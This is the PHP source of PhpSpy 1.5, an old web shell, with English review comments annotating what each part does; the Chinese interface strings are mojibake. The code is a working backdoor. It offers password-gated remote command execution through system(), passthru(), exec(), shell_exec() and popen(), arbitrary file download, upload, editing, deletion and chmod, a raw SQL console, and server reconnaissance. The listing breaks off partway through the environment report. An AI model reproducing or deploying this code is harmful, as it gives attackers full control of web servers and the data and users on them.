<?php
/*
+--------------------------------------------------------------------------+
| PhpSpy Version:1.5                                                       |
| Codz by Angel                                                            |
| (c) 2004 Security Angel Team                                             |
| http://www.4ngel.net                                                     |
| ======================================================================== |
| Team: http://www.4ngel.net                                               |
|       http://www.bugkidz.org                                             |
| Email: 4ngel@21cn.com                                                    |
| Date: July 22st(My mother's birthday), 2004                              |
+--------------------------------------------------------------------------+
*/

/*
 * NOTE(review): what this part of the script does, as far as the code below shows.
 *   - Authentication is one hard-coded secret ($admin['pass']) compared with
 *     a loose ==. On success the session variable or cookie named "adminpass"
 *     is set to the secret itself, so in cookie mode the plaintext password
 *     is what the browser sends back in its Cookie header for one day.
 *   - extract() copies every POST and then GET parameter into the global
 *     scope before any check runs. EXTR_SKIP keeps variables that already
 *     exist, so $admin cannot be replaced that way, but every bare variable
 *     read later ($downfile, $dir, ...) is request-controlled.
 *   - After the login gate, a downfile parameter makes the script stream any
 *     file the PHP process can read; no base directory is enforced.
 * Triage anchors visible here: the "PhpSpy" banner text, the adminpass form
 * field / session key / cookie name, and the action=login and action=logout
 * parameter values.
 */

error_reporting(7); // 7 = E_ERROR | E_WARNING | E_PARSE; notices are not reported
ob_start();
// Start timestamp, read again by debuginfo() for the "Processed in ..." footer.
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];

/*===================== Program configuration =====================*/
// Whether password verification is required: "1" = required, any other value = direct entry
// (the two options below then have no effect).
$admin['check']="1";
// Verification mode: "1" = session, any other value = cookie.
// Session is the default; the original comment suggests cookie mode when session login does not work.
$admin['checkmode']="1";
// Login secret. NOTE(review): stored in clear text in the file and reused as the session/cookie value.
$admin['pass']="hkuser";
/*===================== End of configuration =====================*/

// Let the script work where register_globals is off: import request parameters as globals.
if ( function_exists('ini_get') ) {
    $onoff = ini_get('register_globals');
} else {
    $onoff = get_cfg_var('register_globals');
}
if ($onoff != 1) {
    // POST is extracted first, so with EXTR_SKIP a POST value wins over a GET value of the same name.
    @extract($_POST, EXTR_SKIP);
    @extract($_GET, EXTR_SKIP);
}

/*===================== Authentication =====================*/
// loginpage() is defined at the end of this file; it prints the password form and calls exit,
// so nothing below the gate runs for a request that fails it.
if($admin['check']=="1") {
    if($admin['checkmode']=="1") {
        /*------- session verification -------*/
        session_start();
        if ($_GET['action'] == "logout") {
            session_destroy();
            echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";
            echo "<span style=\"font-size: 12px; font-family: Verdana\">×¢Ïú³É¹¦......<p><a href=\"".$_SERVER['PHP_SELF']."\">ÈýÃëºó×Ô¶¯Í˳ö»òµ¥»÷ÕâÀïÍ˳ö³ÌÐò½çÃæ>>></a></span>";
            exit;
        }
        if ($_POST['action'] == "login") {
            $adminpass=trim($_POST['adminpass']);
            // Loose comparison of the submitted value with the hard-coded secret.
            if ($adminpass==$admin['pass']) {
                $_SESSION['adminpass'] = $admin['pass'];
                echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";
                // The line break inside the next string literal is present in this listing.
                echo "<span style=\"font-size: 12px; font-family: 
Verdana\">µÇ½³É¹¦......<p><a href=\"".$_SERVER['PHP_SELF']."\">ÈýÃëºó×Ô¶¯Ìøת»òµ¥»÷ÕâÀï½øÈë³ÌÐò½çÃæ>>></a></span>";
                exit;
            }
        }
        // NOTE(review): session_is_registered() was removed in PHP 5.4, which dates this branch
        // to older interpreters.
        if (session_is_registered('adminpass')) {
            if ($_SESSION['adminpass']!=$admin['pass']) {
                loginpage();
            }
        } else {
            loginpage();
        }
    } else {
        /*------- cookie verification -------*/
        if ($_GET['action'] == "logout") {
            setcookie ("adminpass", "");
            echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";
            echo "<span style=\"font-size: 12px; font-family: Verdana\">×¢Ïú³É¹¦......<p><a href=\"".$_SERVER['PHP_SELF']."\">ÈýÃëºó×Ô¶¯Í˳ö»òµ¥»÷ÕâÀïÍ˳ö³ÌÐò½çÃæ>>></a></span>";
            exit;
        }
        if ($_POST['action'] == "login") {
            $adminpass=trim($_POST['adminpass']);
            if ($adminpass==$admin['pass']) {
                // The cookie value is the secret itself; lifetime is one day and only
                // name, value and expiry are passed to setcookie().
                setcookie ("adminpass",$admin['pass'],time()+(1*24*3600));
                echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";
                echo "<span style=\"font-size: 12px; font-family: Verdana\">µÇ½³É¹¦......<p><a href=\"".$_SERVER['PHP_SELF']."\">ÈýÃëºó×Ô¶¯Ìøת»òµ¥»÷ÕâÀï½øÈë³ÌÐò½çÃæ>>></a></span>";
                exit;
            }
        }
        // Any request carrying a cookie adminpass equal to the secret passes the gate.
        if (isset($_COOKIE['adminpass'])) {
            if ($_COOKIE['adminpass']!=$admin['pass']) {
                loginpage();
            }
        } else {
            loginpage();
        }
    }
}//end check
/*===================== End of authentication =====================*/

// Check the magic_quotes_gpc state and undo its escaping on $_GET / $_POST.
// This runs after extract(), so the globals extracted above are not touched by it.
if (get_magic_quotes_gpc()) {
    $_GET = stripslashes_array($_GET);
    $_POST = stripslashes_array($_POST);
}

// Download file.
// NOTE(review): $downfile is never assigned by the script; it exists only when the request
// supplied it. The path is passed to readfile() as given.
if (!empty($downfile)) {
    if (!@file_exists($downfile)) {
        echo "<script>alert('ÄãҪϵÄÎļþ²»´æÔÚ!')</script>";
    } else {
        $filename = basename($downfile);
        $filename_info = explode('.', $filename);
        $fileext = $filename_info[count($filename_info)-1];
        // Response headers are built from the requested name: application/x-<extension>
        // and an unquoted attachment filename.
        header('Content-type: application/x-'.$fileext);
        header('Content-Disposition: attachment; filename='.$filename);
        header('Content-Description: PHP3 Generated Data');
        @readfile($downfile);
        exit;
    }
}

// Program directory (filesystem), with backslashes normalised to forward slashes.
$pathname=str_replace('\\','/',dirname(__FILE__));

// Get the current path: default to "." when the request supplied no dir.
if (!isset($dir) or empty($dir)) {
    $dir = ".";
    $nowpath = getPath($pathname, $dir);
} else {
// NOTE(review): continues the else-branch opened just above. Whatever extract() produced for
// $dir is replaced by $_GET['dir'], so a dir sent only in a POST body is discarded here.
    $dir=$_GET['dir'];
    // $nowpath is used below for the writability probe and for display only; the file
    // operations further down use $dir directly.
    $nowpath = getPath($pathname, $dir);
}

// Determine whether the current directory is writable.
// NOTE(review): dir_writeable() (end of file) creates the directory if it is missing and writes,
// then deletes, a file named test.txt in it, so rendering any page touches the filesystem.
if (dir_writeable($nowpath)) {
    $dir_writeable = "¿Éд";
} else {
    $dir_writeable = "²»¿Éд";
}

// Menu entries are shown only when the feature looks available: the PHPINFO link when
// "phpinfo" is not found in disable_functions, the shell link when safe_mode is not set.
$dis_func = get_cfg_var("disable_functions");
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\">PHPINFO</a>" : "";
$shellmode=(!get_cfg_var("safe_mode")) ? " | <a href=\"?action=shell\">WebShellģʽ</a>" : "";
?> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <title>PhpSpy Ver 1.5</title> <style type="text/css"> .maintable { background-color: "#FFFFFF"; border: "1px solid #115173"; } body,td { font-family: "sans-serif"; font-size: "12px"; line-height: "150%"; } .INPUT { FONT-SIZE: "12px"; COLOR: "#000000"; BACKGROUND-COLOR: "#FFFFFF"; height: "18px"; border: "1px solid #666666"; } a:link, a:visited, a:active{ color: "#000000"; text-decoration: underline; } a:hover{ color: "#465584"; text-decoration: none; } .firstalt {BACKGROUND-COLOR: "#EFEFEF"} .secondalt {BACKGROUND-COLOR: "#F5F5F5"} </style> </head> <body style="table-layout:fixed; word-break:break-all"> <center> <p><strong><a href="?action=logout">×¢Ïú»á»°</a> | <a href="?action=dir">·µ»Ø¸ùĿ¼</a> | <a href="?action=phpenv">PHP»·¾³±äÁ¿</a><?=$phpinfo?><?=$shellmode?> | <a href="?action=sql">SQL²éѯ</a> | <a href="http://www.4ngel.net" target="_blank" title="ÏÂÔش˳ÌÐò">Version 1.5</a></strong></p> <?php
// action=phpinfo: dump phpinfo() unless the function name appears in disable_functions.
if ($_GET['action'] == "phpinfo") {
    $dis_func = get_cfg_var("disable_functions");
    echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() º¯ÊýÒѱ»½ûÓÃ,Çë²é¿´<PHP»·¾³±äÁ¿>";
    exit;
}
// The forms below post the fields the dispatcher reads: dir, uploadmyfile/uploaddir,
// newfile, newdirectory, each with a hidden action value.
?> <table width="760" border="0" cellpadding="0"> <form action="" method="GET"> <tr> <td><p>³ÌÐò·¾¶:<?=$pathname?><br>µ±Ç°Ä¿Â¼(<?=$dir_writeable?>,<?=substr(base_convert(@fileperms($nowpath),10,8),-4);?>):<?=$nowpath?> <br>ÌøתĿ¼: <input name="dir" type="text" class="INPUT"> <input type="submit" class="INPUT" value="È·¶¨"> ¡¼Ö§³Ö¾ø¶Ô·¾¶ºÍÏà¶Ô·¾¶¡½ </p></td> </tr> </form> <form action="?dir=<?=urlencode($dir)?>" method="POST" enctype="multipart/form-data"> <tr> <td colspan="2">ÉÏ´«Îļþµ½µ±Ç°Ä¿Â¼: <input name="uploadmyfile" type="file" class="INPUT"> <input type="submit" class="INPUT" value="È·¶¨"> <input name="action" type="hidden" value="uploadfile"><input type="hidden" name="uploaddir" value="<?=$dir?>"></td> </tr> </form> <form action="?action=editfile&dir=<?=urlencode($dir)?>" method="POST"> <tr> <td colspan="2">н¨ÎļþÔÚµ±Ç°Ä¿Â¼: <input name="newfile" type="text" class="INPUT" value=""> <input type="submit" class="INPUT" value="È·¶¨"> <input name="action" type="hidden" value="createfile"></td> </tr> </form> <form action="" method="POST"> <tr> <td colspan="2">н¨Ä¿Â¼ÔÚµ±Ç°Ä¿Â¼: <input name="newdirectory" type="text" class="INPUT" value=""> <input type="submit" class="INPUT" value="È·¶¨"> <input name="action" type="hidden" value="createdirectory"></td> </tr> </form> </table> <hr width="760" noshade> <?php
/*===================== Perform operation: start =====================*/
/*
 * NOTE(review): operation dispatcher. It is a single if/elseif chain, so at most one
 * operation runs per request. Apart from $dir, none of the bare variables read here
 * ($delfile, $deldir, $newdirectory, $uploaddir, $editfilename, $file, $connect,
 * $doquery and the database settings) is assigned by the script before this point; they
 * exist only when the request supplied them. No path is confined to a base directory,
 * and most filesystem calls carry @, so failures are silenced.
 * eregi() above and the mysql_* functions below were removed in PHP 7.0, which scopes
 * this code to older interpreters.
 */
echo "<p><b>\n";
// Delete file: unlink() on the request-supplied path (reachable through a plain GET link).
if(@$delfile!="") {
    if(file_exists($delfile)) {
        @unlink($delfile);
        // The line break inside the next string literal is present in this listing.
        echo "".$delfile." 
ɾ³ý³É¹¦!";
    } else {
        echo "ÎļþÒѲ»´æÔÚ,ɾ³ýʧ°Ü!";
    }
}
// Delete directory: recursive removal through deltree() (end of file).
elseif($_POST['action'] == "rmdir") {
    if($deldir!="") {
        $deldirs="$dir/$deldir";
        if(!file_exists("$deldirs")) {
            echo "Ŀ¼ÒѲ»´æÔÚ!";
        } else {
            deltree($deldirs);
        }
    } else {
        echo "ɾ³ýʧ°Ü!";
    }
}
// Create directory: created and then chmod-ed to mode 0777.
elseif($_POST['action'] == "createdirectory") {
    if(!empty($newdirectory)) {
        $mkdirs="$dir/$newdirectory";
        if(file_exists("$mkdirs")) {
            echo "¸ÃĿ¼ÒÑ´æÔÚ!";
        } else {
            echo $msg=@mkdir("$mkdirs",0777) ? "´´½¨Ä¿Â¼³É¹¦!" : "´´½¨Ê§°Ü!";
            @chmod("$mkdirs",0777);
        }
    }
}
// Upload file: copy() from the upload temp file to $uploaddir/<client-supplied name>;
// neither the directory nor the file name is checked.
elseif($_POST['action'] == "uploadfile") {
    echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadmyfile']['name']."") ? "ÉÏ´«³É¹¦!" : "ÉÏ´«Ê§°Ü!";
}
// Edit file: opens $dir/$editfilename in "w" mode (truncate or create) and writes the
// posted filecontent field as-is.
elseif($_POST['action'] == "doeditfile") {
    $filename="$dir/$editfilename";
    @$fp=fopen("$filename","w");
    echo $msg=@fwrite($fp,$_POST['filecontent']) ? "дÈëÎļþ³É¹¦!" : "дÈëʧ°Ü!";
    @fclose($fp);
}
// Edit file permissions: the posted octal string is converted with base_convert() and applied with chmod().
elseif($_POST['action'] == "editfileperm") {
    $fileperm=base_convert($_POST['fileperm'],8,10);
    echo $msg=@chmod($dir."/".$file,$fileperm) ? "ÊôÐÔÐ޸ijɹ¦!" : "ÐÞ¸Äʧ°Ü!";
    echo " [".$file."] Ð޸ĺóµÄÊôÐÔΪ:".substr(base_convert(@fileperms($dir."/".$file),10,8),-4)."";
}
// Connect to MySQL: connection test with request-supplied host, user, password and database.
elseif($connect) {
    if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {
        echo "Êý¾Ý¿âÁ¬½Ó³É¹¦!";
    } else {
        echo mysql_error();
    }
}
// Execute SQL statement: the posted sql_query field is sent to the server unchanged;
// only success or the error text is shown, no result rows.
elseif($doquery) {
    @mysql_connect($servername,$dbusername,$dbpassword) or die("Êý¾Ý¿âÁ¬½Óʧ°Ü");
    @mysql_select_db($dbname) or die("Ñ¡ÔñÊý¾Ý¿âʧ°Ü");
    $result = @mysql_query($_POST['sql_query']);
    if ($result) {
        echo "SQLÓï¾ä³É¹¦Ö´ÐÐ";
    }else{
        echo "³ö´í: ".mysql_error();
    }
    mysql_close();
}
// View a PHP configuration parameter: the posted name is echoed back unescaped next to its value.
elseif($_POST['action'] == "viewphpvar") {
    // The line break inside the next string literal is present in this listing.
    echo "ÅäÖòÎÊý ".$_POST['phpvarname']." 
¼ì²â½á¹û: ".getphpcfg($_POST['phpvarname'])."";
}
// No operation requested: print the author banner.
else {
    echo "±¾³ÌÐòÓÉ Security Angel °²È«×éÖ¯ angel[BST] ¶ÀÁ¢¿ª·¢,¿ÉÔÚ <a href=\"http://www.4ngel.net\" target=\"_blank\">http://www.4ngel.net</a> ÏÂÔØ×îа汾.";
}
echo "</b></p>\n";
/*===================== Perform operation: end =====================*/

// Default view (no action, or action=dir): list $dir, directories first, then files.
if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
?> <table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff"> <tr bgcolor="#cccccc"> <td align="center" nowrap width="40%"><b>Îļþ</b></td> <td align="center" nowrap width="20%"><b>ÐÞ¸ÄÈÕÆÚ</b></td> <td align="center" nowrap width="12%"><b>´óС</b></td> <td align="center" nowrap width="8%"><b>ÊôÐÔ</b></td> <td align="center" nowrap width="20%"><b>²Ù×÷</b></td> </tr> <?php
// Directory list.
// NOTE(review): entry names are written into the HTML without escaping; every row links
// back to this script with dir / action / file / deldir query parameters.
$dirs=@opendir($dir);
while ($file=@readdir($dirs)) {
    $b="$dir/$file";
    $a=@is_dir($b);
    if($a=="1"){
        if($file!=".."&&$file!=".") {
            $lastsave=@date("Y-n-d H:i:s",filemtime("$dir/$file"));
            $dirperm=substr(base_convert(fileperms("$dir/$file"),10,8),-4);
            echo "<tr class=".getrowbg().">\n";
            echo " <td style=\"padding-left: 5px;\">[<a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>\n";
            echo " <td align=\"center\" nowrap valign=\"top\">$lastsave</td>\n";
            echo " <td align=\"center\" nowrap valign=\"top\"><dir></td>\n";
            echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$dirperm</a></td>\n";
            echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?action=deldir&dir=".urlencode($dir)."&deldir=".urlencode($file)."\">ɾ³ý</a></td>\n";
            echo "</tr>\n";
        } else {
            // ".." becomes the "parent directory" row; "." is skipped.
            if($file=="..") {
                echo "<tr class=".getrowbg().">\n";
                echo " <td nowrap colspan=\"5\" style=\"padding-left: 5px;\"><a href=\"?dir=".$dir."/".$file."\">·µ»ØÉϼ¶Ä¿Â¼</a></td>\n";
                echo "</tr>\n";
            }
        }
        $dir_i++;
    }
}//while
@closedir($dirs);
// File list: second pass over the same directory.
$dirs=@opendir($dir);
while ($file=@readdir($dirs)) {
    $b="$dir/$file";
// NOTE(review): continues the file-listing while loop opened just above.
    $a=@is_dir($b);
    if($a=="0"){
        // Size in KB with three decimals, change time, and the last four octal permission digits.
        $size=@filesize("$dir/$file");
        $size=$size/1024 ;
        $size= @number_format($size, 3);
        $lastsave=@date("Y-n-d H:i:s",filectime("$dir/$file"));
        @$fileperm=substr(base_convert(fileperms("$dir/$file"),10,8),-4);
        echo "<tr class=".getrowbg().">\n";
        // File names are written into the HTML without escaping.
        echo " <td style=\"padding-left: 5px;\"><a href=\"$dir/$file\" target=\"_blank\">$file</a></td>\n";
        echo " <td align=\"center\" nowrap valign=\"top\">$lastsave</td>\n";
        echo " <td align=\"center\" nowrap valign=\"top\">$size KB</td>\n";
        echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$fileperm</a></td>\n";
        // NOTE(review): download, edit and delete are plain GET links (downfile=, action=editfile,
        // delfile=), so these operations carry their target path in the request URL, where
        // web-server access logs typically record it.
        echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?downfile=".urlencode($dir)."/".urlencode($file)."\">ÏÂÔØ</a> | <a href=\"?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."\">±à¼</a> | <a href=\"?dir=".urlencode($dir)."&delfile=".urlencode($dir)."/".urlencode($file)."\">ɾ³ý</a></td>\n";
        echo "</tr>\n";
        $file_i++;
    }
}
@closedir($dirs);
// Summary row: number of directories and files counted above.
echo "<tr class=".getrowbg().">\n";
// The line break inside the next string literal is present in this listing.
echo " <td nowrap colspan=\"5\" align=\"right\">".$dir_i." ¸öĿ¼<br>".$file_i." 
¸öÎļþ</td>\n";
echo "</tr>\n";
?> </table> <?php
}// end dir
// action=editfile: editor form. With no newfile parameter the existing file $dir/$editfile is
// read and HTML-escaped for the textarea; otherwise the form starts empty for a new name.
// $editfile itself is written into the value attribute unescaped.
elseif ($_GET['action'] == "editfile") {
    if($newfile=="") {
        $filename="$dir/$editfile";
        $fp=@fopen($filename,"r");
        $contents=@fread($fp, filesize($filename));
        @fclose($fp);
        $contents=htmlspecialchars($contents);
    }else{
        $editfile=$newfile;
        $filename = "$dir/$editfile";
    }
?> <table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff"> <tr class="firstalt"> <td align="center">н¨/±à¼Îļþ [<a href="?dir=<?=urlencode($dir)?>">·µ»Ø</a>]</td> </tr> <form action="?dir=<?=urlencode($dir)?>" method="POST"> <tr class="secondalt"> <td align="center">µ±Ç°Îļþ:<input class="input" type="text" name="editfilename" size="30" value="<?=$editfile?>"> ÊäÈëÐÂÎļþÃûÔò½¨Á¢ÐÂÎļþ</td> </tr> <tr class="firstalt"> <td align="center"><textarea name="filecontent" cols="100" rows="20"><?=$contents?></textarea></td> </tr> <tr class="secondalt"> <td align="center"><input type="submit" value="È·¶¨Ð´Èë" class="input"> <input name="action" type="hidden" value="doeditfile"> <input type="reset" value="ÖØÖÃ" class="input"></td> </tr> </form> </table> <?php
}//end editfile
/*
 * action=shell: command execution form.
 * NOTE(review): the only gate is the safe_mode setting; disable_functions is not consulted
 * here. The posted command string is handed unmodified to one of five process-execution
 * functions chosen by the request-supplied $execfunc, and any other value falls back to
 * system(). If system, passthru, exec, shell_exec and popen are all listed in
 * disable_functions, none of the calls in this branch can run. The command is also
 * reflected unescaped into the form's value attribute.
 */
elseif ($_GET['action'] == "shell") {
    if (!get_cfg_var("safe_mode")) {
?> <table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff"> <tr class="firstalt"> <td align="center">WebShell Mode</td> </tr> <form action="?action=shell&dir=<?=urlencode($dir)?>" method="POST"> <tr class="secondalt"> <td align="center">Ìáʾ:Èç¹ûÊä³ö½á¹û²»ÍêÈ«,½¨Òé°ÑÊä³ö½á¹ûдÈëÎļþ.ÕâÑù¿ÉÒԵõ½È«²¿ÄÚÈÝ.</td> </tr> <tr class="firstalt"> <td align="center"> Ñ¡ÔñÖ´Ðк¯Êý: <select name="execfunc" class="input"> <option value="system" <? if ($execfunc=="system") { echo "selected"; } ?>>system</option> <option value="passthru" <? if ($execfunc=="passthru") { echo "selected"; } ?>>passthru</option> <option value="exec" <? if ($execfunc=="exec") { echo "selected"; } ?>>exec</option> <option value="shell_exec" <? 
if ($execfunc=="shell_exec") { echo "selected"; } ?>>shell_exec</option> <option value="popen" <? if ($execfunc=="popen") { echo "selected"; } ?>>popen</option> </select>¡¡ ÊäÈëÃüÁî: <input type="text" name="command" size="60" value="<?=$_POST['command']?>" class="input"> <input type="submit" value="execute" class="input"></td> </tr> <tr class="secondalt"> <td align="center"><textarea name="textarea" cols="100" rows="25" readonly><?php
        // Output is written straight into the read-only textarea.
        if (!empty($_POST['command'])) {
            if ($execfunc=="system") {
                system($_POST['command']);
            } elseif ($execfunc=="passthru") {
                passthru($_POST['command']);
            } elseif ($execfunc=="exec") {
                // exec() returns only the last line of output.
                $result = exec($_POST['command']);
                echo $result;
            } elseif ($execfunc=="shell_exec") {
                $result=shell_exec($_POST['command']);
                echo $result;
            } elseif ($execfunc=="popen") {
                // A single fread() of at most 2096 bytes, so longer output is cut off.
                $pp = popen($_POST['command'], 'r');
                $read = fread($pp, 2096);
                echo $read;
                pclose($pp);
            } else {
                system($_POST['command']);
            }
        }
?></textarea></td> </tr> </form> </table> <?php
    } else {
?> <p><b>Safe_Mode ÒÑ´ò¿ª, ÎÞ·¨Ö´ÐÐϵͳÃüÁî.</b></p> <?php
    }
}//end shell
// action=deldir: confirmation form that posts action=rmdir with the directory name.
elseif ($_GET['action'] == "deldir") {
?> <table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff"> <form action="?dir=<?=urlencode($dir)?>" method="POST"> <tr class="firstalt"> <td align="center">ɾ³ý <input name="deldir" type="text" value="<?=$deldir?>" class="input" readonly> Ŀ¼</td> </tr> <tr class="secondalt"> <td align="center">×¢Òâ:Èç¹û¸ÃĿ¼·Ç¿Õ,´Ë´Î²Ù×÷½«»áɾ³ý¸ÃĿ¼ÏµÄËùÓÐÎļþ.ÄúÈ·¶¨Âð?</td> </tr> <tr class="firstalt"> <td align="center"> <input name="action" type="hidden" value="rmdir"> <input type="submit" value="delete" class="input"> </td> </tr> </form> </table> <?php
}//end deldir
// action=fileperm: form showing the current permission digits and posting action=editfileperm.
// The line break inside the td tag below is present in this listing.
elseif ($_GET['action'] == "fileperm") {
?> <table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff"> <tr class="firstalt"> <td align="center">ÐÞ¸ÄÎļþÊôÐÔ [<a href="?dir=<?=urlencode($dir)?>">·µ»Ø</a>]</td> </tr> <form action="?dir=<?=urlencode($dir)?>" method="POST"> <tr class="secondalt"> <td 
align="center"><input name="file" type="text" value="<?=$file?>" class="input" readonly> µÄÊôÐÔΪ: <input type="text" name="fileperm" size="20" value="<?=substr(base_convert(fileperms($dir."/".$file),10,8),-4)?>" class="input"> <input name="dir" type="hidden" value="<?=urlencode($dir)?>"> <input name="action" type="hidden" value="editfileperm"> <input type="submit" value="modify" class="input"></td> </tr> </form> </table> <?php
}//end fileperm
// action=sql: database form. Defaults are host 127.0.0.1, user root and an empty password;
// submitted values, including the password, are echoed back into plain text inputs.
// The submit buttons are named connect and doquery, which is what the dispatcher tests.
elseif ($_GET['action'] == "sql") {
    $servername = isset($servername) ? $servername : '127.0.0.1';
    $dbusername = isset($dbusername) ? $dbusername : 'root';
    $dbpassword = isset($dbpassword) ? $dbpassword : '';
    $dbname = isset($dbname) ? $dbname : '';
?> <table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff"> <tr class="firstalt"> <td align="center">Ö´ÐÐ SQL Óï¾ä</td> </tr> <form action="?action=sql" method="POST"> <tr class="secondalt"> <td align="center">Host: <input name="servername" type="text" class="INPUT" value="<?=$servername?>"> User: <input name="dbusername" type="text" class="INPUT" size="15" value="<?=$dbusername?>"> Pass: <input name="dbpassword" type="text" class="INPUT" size="15" value="<?=$dbpassword?>"> DB: <input name="dbname" type="text" class="INPUT" size="15" value="<?=$dbname?>"> <input name="connect" type="submit" class="INPUT" value="Á¬½Ó"></td> </tr> <tr class="firstalt"> <td align="center"><textarea name="sql_query" cols="85" rows="10"></textarea></td> </tr> <tr class="secondalt"> <td align="center"><input type="submit" name="doquery" value="Ö´ÐÐ" class="input"></td> </tr> </form> </table> <?php
}//end sql query
/*
 * action=phpenv: environment report. Builds $info as [label, value] pairs from server
 * variables, PHP settings and function_exists() probes, then prints them in three groups.
 * NOTE(review): index 4 is never assigned. Entry 10 looks up "safemode", while the rest of
 * the file spells the directive safe_mode, so that lookup presumably never matches.
 */
elseif ($_GET['action'] == "phpenv") {
    $upsize=get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "²»ÔÊÐíÉÏ´«";
    $adminmail=(isset($_SERVER["SERVER_ADMIN"])) ? "<a href=\"mailto:".$_SERVER["SERVER_ADMIN"]."\">".$_SERVER["SERVER_ADMIN"]."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";
    // disable_functions is shown one name per row (spaces and commas become <br>).
    $dis_func = get_cfg_var("disable_functions");
    if ($dis_func == "") {
        $dis_func = "No";
    }else {
        $dis_func = str_replace(" ","<br>",$dis_func);
        $dis_func = str_replace(",","<br>",$dis_func);
    }
    $phpinfo=(!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
    // Server properties (printed as rows 0-12).
    $info[0] = array("·þÎñÆ÷ʱ¼ä",date("YÄêmÔÂdÈÕ h:i:s",time()));
    $info[1] = array("·þÎñÆ÷ÓòÃû","<a href=\"http://$_SERVER[SERVER_NAME]\" target=\"_blank\">$_SERVER[SERVER_NAME]</a>");
    $info[2] = array("·þÎñÆ÷IPµØÖ·",gethostbyname($_SERVER["SERVER_NAME"]));
    $info[3] = array("·þÎñÆ÷²Ù×÷ϵͳ",PHP_OS);
    $info[5] = array("·þÎñÆ÷²Ù×÷ϵͳÎÄ×Ö±àÂë",$_SERVER["HTTP_ACCEPT_LANGUAGE"]);
    $info[6] = array("·þÎñÆ÷½âÒëÒýÇæ",$_SERVER["SERVER_SOFTWARE"]);
    $info[7] = array("Web·þÎñ¶Ë¿Ú",$_SERVER["SERVER_PORT"]);
    $info[8] = array("PHPÔËÐз½Ê½",strtoupper(php_sapi_name()));
    $info[9] = array("PHP°æ±¾",PHP_VERSION);
    $info[10] = array("ÔËÐÐÓÚ°²È«Ä£Ê½",getphpcfg("safemode"));
    $info[11] = array("·þÎñÆ÷¹ÜÀíÔ±",$adminmail);
    $info[12] = array("±¾Îļþ·¾¶",__FILE__);
    // PHP settings (printed as rows 13-24).
    $info[13] = array("ÔÊÐíʹÓà URL ´ò¿ªÎļþ allow_url_fopen",getphpcfg("allow_url_fopen"));
    $info[14] = array("ÔÊÐí¶¯Ì¬¼ÓÔØÁ´½Ó¿â enable_dl",getphpcfg("enable_dl"));
    $info[15] = array("ÏÔʾ´íÎóÐÅÏ¢ display_errors",getphpcfg("display_errors"));
    $info[16] = array("×Ô¶¯¶¨ÒåÈ«¾Ö±äÁ¿ register_globals",getphpcfg("register_globals"));
    $info[17] = array("magic_quotes_gpc",getphpcfg("magic_quotes_gpc"));
    $info[18] = array("³ÌÐò×î¶àÔÊÐíʹÓÃÄÚ´æÁ¿ memory_limit",getphpcfg("memory_limit"));
    $info[19] = array("POST×î´ó×Ö½ÚÊý post_max_size",getphpcfg("post_max_size"));
    $info[20] = array("ÔÊÐí×î´óÉÏ´«Îļþ upload_max_filesize",$upsize);
    $info[21] = array("³ÌÐò×ÔËÐÐʱ¼ä max_execution_time",getphpcfg("max_execution_time")."Ãë");
    $info[22] = array("±»½ûÓõĺ¯Êý disable_functions",$dis_func);
    $info[23] = array("phpinfo()",$phpinfo);
    $info[24] = 
array("Ä¿Ç°»¹ÓпÕÓà¿Õ¼ädiskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb');
    // Extension / component probes via function_exists() (printed as rows 25-40).
    $info[25] = array("ͼÐδ¦Àí GD Library",getfun("imageline"));
    $info[26] = array("IMAPµç×ÓÓʼþϵͳ",getfun("imap_close"));
    $info[27] = array("MySQLÊý¾Ý¿â",getfun("mysql_close"));
    $info[28] = array("SyBaseÊý¾Ý¿â",getfun("sybase_close"));
    $info[29] = array("OracleÊý¾Ý¿â",getfun("ora_close"));
    $info[30] = array("Oracle 8 Êý¾Ý¿â",getfun("OCILogOff"));
    $info[31] = array("PRELÏàÈÝÓï·¨ PCRE",getfun("preg_match"));
    $info[32] = array("PDFÎĵµÖ§³Ö",getfun("pdf_close"));
    $info[33] = array("Postgre SQLÊý¾Ý¿â",getfun("pg_close"));
    $info[34] = array("SNMPÍøÂç¹ÜÀíÐÒé",getfun("snmpget"));
    $info[35] = array("ѹËõÎļþÖ§³Ö(Zlib)",getfun("gzclose"));
    $info[36] = array("XML½âÎö",getfun("xml_set_object"));
    $info[37] = array("FTP",getfun("ftp_login"));
    $info[38] = array("ODBCÊý¾Ý¿âÁ¬½Ó",getfun("odbc_close"));
    $info[39] = array("SessionÖ§³Ö",getfun("session_start"));
    $info[40] = array("SocketÖ§³Ö",getfun("fsockopen"));
